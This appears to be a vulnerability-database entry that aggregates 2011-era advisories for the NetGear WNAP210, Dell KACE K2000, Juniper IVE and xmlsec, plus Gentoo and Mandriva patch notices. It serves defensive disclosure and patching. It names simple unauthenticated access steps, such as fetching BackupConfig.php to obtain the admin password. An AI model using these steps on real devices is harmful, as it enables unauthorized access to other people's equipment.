VARIoT IoT vulnerabilities database

The NetGear ProSafe WNAP210 with firmware 2.0.12 allows remote attackers to bypass authentication and obtain access to the configuration page by visiting recreate.php and then visiting index.php. NetGear WNAP210 is vulnerable to remote administrator password disclosure and administrative web page login bypass. Netgear ProSafe Wireless Access Point (WNAP210) Has multiple vulnerabilities. Netgear Provided by WNAP210 Has two vulnerabilities. This configuration stores the administrator password in clear text. NETGEAR WNAP210 has a security bypass vulnerability in its implementation. WNAP210 firmware 2.0.12 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: NetGear WNAP210 Backup Disclosure and Authentication Bypass Vulnerabilities SECUNIA ADVISORY ID: SA44045 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44045/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44045 RELEASE DATE: 2011-04-06 DISCUSS ADVISORY: http://secunia.com/advisories/44045/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44045/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44045 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in Netgear ProSafe Wireless-N Access Point WNAP210, which can be exploited by malicious people to disclose sensitive information and bypass certain security restrictions. SOLUTION: Update to the latest firmware. Please contact the vendor for more details. PROVIDED AND/OR DISCOVERED BY: Trevor Seward via US-CERT. ORIGINAL ADVISORY: US-CERT VU#644812: http://www.kb.cert.org/vuls/id/644812 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

BackupConfig.php on the NetGear ProSafe WNAP210 allows remote attackers to obtain the administrator password by reading the configuration file. Netgear ProSafe Wireless Access Point (WNAP210) Has multiple vulnerabilities. Netgear Provided by WNAP210 Has two vulnerabilities. An attacker with a network access device can browse the WEB page http://NetGearDeviceIP/BackupConfig.php, which will prompt the attacker to download the device configuration without any login authentication. Access to the BackupConfig.php script is not properly restricted and can be used to download configuration files for backup and leak administrator passwords. WNAP210 firmware 2.0.12 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: NetGear WNAP210 Backup Disclosure and Authentication Bypass Vulnerabilities SECUNIA ADVISORY ID: SA44045 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44045/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44045 RELEASE DATE: 2011-04-06 DISCUSS ADVISORY: http://secunia.com/advisories/44045/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44045/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44045 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in Netgear ProSafe Wireless-N Access Point WNAP210, which can be exploited by malicious people to disclose sensitive information and bypass certain security restrictions. SOLUTION: Update to the latest firmware. Please contact the vendor for more details. PROVIDED AND/OR DISCOVERED BY: Trevor Seward via US-CERT. ORIGINAL ADVISORY: US-CERT VU#644812: http://www.kb.cert.org/vuls/id/644812 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Dell KACE K2000 Systems Deployment Appliance 3.3.36822 and earlier contains a peinst CIFS share, which allows remote attackers to obtain sensitive information by reading the (1) unattend.xml or (2) sysprep.inf file, as demonstrated by reading a password. Dell Kace K2000 Systems Deployment Appliance Contains a vulnerability. Dell Kace K2000 Systems Deployment Appliance Is Windows You are using a file share for installation. This file share has a hidden attribute, Windows Contains files used at startup. Access to this file share is not restricted and may be accessed without authentication. In addition, Dell The following vulnerability information has been released. This hidden, read-only fileshare is populated with pre- and post-installation tasks as well as deployment bootfiles and media used for Windows network operating system installs (called "Scripted Installs") and imaging (called "K-images"). This fileshare is hidden. Dell Kace K2000 is prone to a remote information-disclosure vulnerability. Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks

Juniper Networks' Secure Access is an enterprise-class SSL VPN access device running on Juniper IVE OS. There is an unspecified error in the Network Connect Credential Provider implementation provided by Juniper Networks Secure Access, which can be exploited by remote attackers to bypass authentication on Windows 7 and Windows Vista. ---------------------------------------------------------------------- Secunia Research and vulnerability disclosures coordinated by Secunia: http://secunia.com/research/ ---------------------------------------------------------------------- TITLE: Juniper IVE Network Connect Credential Provider Security Bypass SECUNIA ADVISORY ID: SA43983 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43983/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43983 RELEASE DATE: 2011-04-02 DISCUSS ADVISORY: http://secunia.com/advisories/43983/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43983/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43983 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Juniper Networks Secure Access, which can be exploited by malicious people to bypass certain security restrictions. SOLUTION: Update to version 6.5R9, 7.0R4, or 7.1R1. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.juniper.net/alerts/viewalert.jsp?txtAlertNumber=PSN-2011-03-187&viewMode=view OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

xslt.c in XML Security Library (aka xmlsec) before 1.2.17, as used in WebKit and other products, when XSLT is enabled, allows remote attackers to create or overwrite arbitrary files via vectors involving the libxslt output extension and a ds:Transform element during signature verification. Remote attackers can exploit this issue to read or write to arbitrary XML files. This may lead to further attacks. Versions prior to XML Security Library 1.2.17 are vulnerable. For the oldstable distribution (lenny), this problem has been fixed in version 1.2.9-5+lenny1. For the stable distribution (squeeze), this problem has been fixed in version 1.2.14-1+squeeze1. For the testing distribution (wheezy) and unstable distribution (sid), this problem has been fixed in version 1.2.14-1.1. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. For more information: SA43920 SOLUTION: Apply updated packages via the apt-get package manager. ---------------------------------------------------------------------- Secunia Research and vulnerability disclosures coordinated by Secunia: http://secunia.com/research/ ---------------------------------------------------------------------- TITLE: XML Security Library XSLT File Access Vulnerability SECUNIA ADVISORY ID: SA43920 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43920/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43920 RELEASE DATE: 2011-04-02 DISCUSS ADVISORY: http://secunia.com/advisories/43920/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43920/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43920 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in the XML Security Library, which can be exploited by malicious people to compromise a vulnerable system. SOLUTION: Update to version 1.2.17. PROVIDED AND/OR DISCOVERED BY: The vendor credits Nicolas Gregoire. ORIGINAL ADVISORY: http://www.aleksey.com/pipermail/xmlsec/2011/009120.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Multiple packages, Multiple vulnerabilities fixed in 2011 Date: December 11, 2014 Bugs: #194151, #294253, #294256, #334087, #344059, #346897, #350598, #352608, #354209, #355207, #356893, #358611, #358785, #358789, #360891, #361397, #362185, #366697, #366699, #369069, #370839, #372971, #376793, #381169, #386321, #386361 ID: 201412-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== This GLSA contains notification of vulnerabilities found in several Gentoo packages which have been fixed prior to January 1, 2012. The worst of these vulnerabilities could lead to local privilege escalation and remote code execution. Please see the package list and CVE identifiers below for more information. Background ========== For more information on the packages listed in this GLSA, please see their homepage referenced in the ebuild. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 games-sports/racer-bin >= 0.5.0-r1 Vulnerable! 2 media-libs/fmod < 4.38.00 >= 4.38.00 3 dev-php/PEAR-Mail < 1.2.0 >= 1.2.0 4 sys-fs/lvm2 < 2.02.72 >= 2.02.72 5 app-office/gnucash < 2.4.4 >= 2.4.4 6 media-libs/xine-lib < 1.1.19 >= 1.1.19 7 media-sound/lastfmplayer < 1.5.4.26862-r3 >= 1.5.4.26862-r3 8 net-libs/webkit-gtk < 1.2.7 >= 1.2.7 9 sys-apps/shadow < 4.1.4.3 >= 4.1.4.3 10 dev-php/PEAR-PEAR < 1.9.2-r1 >= 1.9.2-r1 11 dev-db/unixODBC < 2.3.0-r1 >= 2.3.0-r1 12 sys-cluster/resource-agents < 1.0.4-r1 >= 1.0.4-r1 13 net-misc/mrouted < 3.9.5 >= 3.9.5 14 net-misc/rsync < 3.0.8 >= 3.0.8 15 dev-libs/xmlsec < 1.2.17 >= 1.2.17 16 x11-apps/xrdb < 1.0.9 >= 1.0.9 17 net-misc/vino < 2.32.2 >= 2.32.2 18 dev-util/oprofile < 0.9.6-r1 >= 0.9.6-r1 19 app-admin/syslog-ng < 3.2.4 >= 3.2.4 20 net-analyzer/sflowtool < 3.20 >= 3.20 21 gnome-base/gdm < 3.8.4-r3 >= 3.8.4-r3 22 net-libs/libsoup < 2.34.3 >= 2.34.3 23 app-misc/ca-certificates < 20110502-r1 >= 20110502-r1 24 dev-vcs/gitolite < 1.5.9.1 >= 1.5.9.1 25 dev-util/qt-creator < 2.1.0 >= 2.1.0 ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- 25 affected packages Description =========== Vulnerabilities have been discovered in the packages listed below. Please review the CVE identifiers in the Reference section for details. * FMOD Studio * PEAR Mail * LVM2 * GnuCash * xine-lib * Last.fm Scrobbler * WebKitGTK+ * shadow tool suite * PEAR * unixODBC * Resource Agents * mrouted * rsync * XML Security Library * xrdb * Vino * OProfile * syslog-ng * sFlow Toolkit * GNOME Display Manager * libsoup * CA Certificates * Gitolite * QtCreator * Racer Impact ====== A context-dependent attacker may be able to gain escalated privileges, execute arbitrary code, cause Denial of Service, obtain sensitive information, or otherwise bypass security restrictions. Workaround ========== There are no known workarounds at this time. Resolution ========== All FMOD Studio users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/fmod-4.38.00" All PEAR Mail users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-php/PEAR-Mail-1.2.0" All LVM2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=sys-fs/lvm2-2.02.72" All GnuCash users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/gnucash-2.4.4" All xine-lib users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/xine-lib-1.1.19" All Last.fm Scrobbler users should upgrade to the latest version: # emerge --sync # emerge -a --oneshot -v ">=media-sound/lastfmplayer-1.5.4.26862-r3" All WebKitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-1.2.7" All shadow tool suite users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=sys-apps/shadow-4.1.4.3" All PEAR users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-php/PEAR-PEAR-1.9.2-r1" All unixODBC users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-db/unixODBC-2.3.0-r1" All Resource Agents users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=sys-cluster/resource-agents-1.0.4-r1" All mrouted users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/mrouted-3.9.5" All rsync users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/rsync-3.0.8" All XML Security Library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/xmlsec-1.2.17" All xrdb users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=x11-apps/xrdb-1.0.9" All Vino users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/vino-2.32.2" All OProfile users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-util/oprofile-0.9.6-r1" All syslog-ng users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/syslog-ng-3.2.4" All sFlow Toolkit users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/sflowtool-3.20" All GNOME Display Manager users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=gnome-base/gdm-3.8.4-r3" All libsoup users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/libsoup-2.34.3" All CA Certificates users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=app-misc/ca-certificates-20110502-r1" All Gitolite users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-vcs/gitolite-1.5.9.1" All QtCreator users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-util/qt-creator-2.1.0" Gentoo has discontinued support for Racer. We recommend that users unmerge Racer: # emerge --unmerge "games-sports/racer-bin" NOTE: This is a legacy GLSA. Updates for all affected architectures have been available since 2012. It is likely that your system is already no longer affected by these issues. References ========== [ 1 ] CVE-2007-4370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4370 [ 2 ] CVE-2009-4023 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4023 [ 3 ] CVE-2009-4111 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4111 [ 4 ] CVE-2010-0778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0778 [ 5 ] CVE-2010-1780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1780 [ 6 ] CVE-2010-1782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1782 [ 7 ] CVE-2010-1783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1783 [ 8 ] CVE-2010-1784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1784 [ 9 ] CVE-2010-1785 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1785 [ 10 ] CVE-2010-1786 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1786 [ 11 ] CVE-2010-1787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1787 [ 12 ] CVE-2010-1788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1788 [ 13 ] CVE-2010-1790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1790 [ 14 ] CVE-2010-1791 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1791 [ 15 ] CVE-2010-1792 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1792 [ 16 ] CVE-2010-1793 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1793 [ 17 ] CVE-2010-1807 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1807 [ 18 ] CVE-2010-1812 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1812 [ 19 ] CVE-2010-1814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1814 [ 20 ] CVE-2010-1815 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1815 [ 21 ] CVE-2010-2526 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2526 [ 22 ] CVE-2010-2901 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2901 [ 23 ] CVE-2010-3255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3255 [ 24 ] CVE-2010-3257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3257 [ 25 ] CVE-2010-3259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3259 [ 26 ] CVE-2010-3362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3362 [ 27 ] CVE-2010-3374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3374 [ 28 ] CVE-2010-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3389 [ 29 ] CVE-2010-3812 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3812 [ 30 ] CVE-2010-3813 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3813 [ 31 ] CVE-2010-3999 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3999 [ 32 ] CVE-2010-4042 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4042 [ 33 ] CVE-2010-4197 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4197 [ 34 ] CVE-2010-4198 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4198 [ 35 ] CVE-2010-4204 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4204 [ 36 ] CVE-2010-4206 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4206 [ 37 ] CVE-2010-4492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4492 [ 38 ] CVE-2010-4493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4493 [ 39 ] CVE-2010-4577 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4577 [ 40 ] CVE-2010-4578 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4578 [ 41 ] CVE-2011-0007 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0007 [ 42 ] CVE-2011-0465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0465 [ 43 ] CVE-2011-0482 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0482 [ 44 ] CVE-2011-0721 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0721 [ 45 ] CVE-2011-0727 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0727 [ 46 ] CVE-2011-0904 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0904 [ 47 ] CVE-2011-0905 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0905 [ 48 ] CVE-2011-1072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1072 [ 49 ] CVE-2011-1097 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1097 [ 50 ] CVE-2011-1144 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1144 [ 51 ] CVE-2011-1425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1425 [ 52 ] CVE-2011-1572 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1572 [ 53 ] CVE-2011-1760 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1760 [ 54 ] CVE-2011-1951 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1951 [ 55 ] CVE-2011-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2471 [ 56 ] CVE-2011-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2472 [ 57 ] CVE-2011-2473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2473 [ 58 ] CVE-2011-2524 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2524 [ 59 ] CVE-2011-3365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3365 [ 60 ] CVE-2011-3366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3366 [ 61 ] CVE-2011-3367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3367 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201412-09.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490 The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1425 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: ab2caef2b723f8a627f4682e9b9b295c 2009.0/i586/libxmlsec1-1-1.2.10-7.3mdv2009.0.i586.rpm a82fe9a2eb07213a40d5b062d0c5a230 2009.0/i586/libxmlsec1-devel-1.2.10-7.3mdv2009.0.i586.rpm 2cec5cb556b742bcc87d10a14ded022c 2009.0/i586/libxmlsec1-gnutls1-1.2.10-7.3mdv2009.0.i586.rpm 7169d872a13bb5da168cad113ca3c9cb 2009.0/i586/libxmlsec1-gnutls-devel-1.2.10-7.3mdv2009.0.i586.rpm d9c9fe192a991bb7937fce742acac213 2009.0/i586/libxmlsec1-nss1-1.2.10-7.3mdv2009.0.i586.rpm c412b1cf110d47b6c9848a2718394e83 2009.0/i586/libxmlsec1-nss-devel-1.2.10-7.3mdv2009.0.i586.rpm fb3fcd72027a0c4707d185c03d7e6ffe 2009.0/i586/libxmlsec1-openssl1-1.2.10-7.3mdv2009.0.i586.rpm ee2375b5ce6b80fb0a37f8a298df8ffc 2009.0/i586/libxmlsec1-openssl-devel-1.2.10-7.3mdv2009.0.i586.rpm 45ec8c67b589d6874c265c316f0ef715 2009.0/i586/xmlsec1-1.2.10-7.3mdv2009.0.i586.rpm 00a18a237c5aee09d3de790df4ee8d0b 2009.0/SRPMS/xmlsec1-1.2.10-7.3mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: ab200f5369469e19e89743b23a097764 2009.0/x86_64/lib64xmlsec1-1-1.2.10-7.3mdv2009.0.x86_64.rpm 15eb2c4424a6d91b68f5caef8db2fdff 2009.0/x86_64/lib64xmlsec1-devel-1.2.10-7.3mdv2009.0.x86_64.rpm ad73f2e06650f4b76b482a1bf7532eac 2009.0/x86_64/lib64xmlsec1-gnutls1-1.2.10-7.3mdv2009.0.x86_64.rpm 7c60997091a4214148c77d2d14c01a94 2009.0/x86_64/lib64xmlsec1-gnutls-devel-1.2.10-7.3mdv2009.0.x86_64.rpm 22ac198274c38732b3f0a65e5814ffc7 2009.0/x86_64/lib64xmlsec1-nss1-1.2.10-7.3mdv2009.0.x86_64.rpm ddb61026f298b57254192f25398498d6 2009.0/x86_64/lib64xmlsec1-nss-devel-1.2.10-7.3mdv2009.0.x86_64.rpm a965cb539117930426efb7b6dbf8553d 2009.0/x86_64/lib64xmlsec1-openssl1-1.2.10-7.3mdv2009.0.x86_64.rpm a2853268d49f512f660b0c85f32f3b98 2009.0/x86_64/lib64xmlsec1-openssl-devel-1.2.10-7.3mdv2009.0.x86_64.rpm cfcb56269c2b2e79ea2701839fa93090 2009.0/x86_64/xmlsec1-1.2.10-7.3mdv2009.0.x86_64.rpm 00a18a237c5aee09d3de790df4ee8d0b 2009.0/SRPMS/xmlsec1-1.2.10-7.3mdv2009.0.src.rpm Mandriva Linux 2010.0: bdc91e075985a73525da8a27c50f3e4d 2010.0/i586/libxmlsec1-1-1.2.13-1.2mdv2010.0.i586.rpm a8cf6ac42e0ae7df962f3b6e1abd0a27 2010.0/i586/libxmlsec1-devel-1.2.13-1.2mdv2010.0.i586.rpm 50e1f9b8c2b36781b5597c37756f0a27 2010.0/i586/libxmlsec1-gnutls1-1.2.13-1.2mdv2010.0.i586.rpm 94b518a20f8d6a99033be5c7fa9a561c 2010.0/i586/libxmlsec1-gnutls-devel-1.2.13-1.2mdv2010.0.i586.rpm b5e93f5674d8b2065e64f2e53ba05605 2010.0/i586/libxmlsec1-nss1-1.2.13-1.2mdv2010.0.i586.rpm 880fe166f23413733c3c3c118d816387 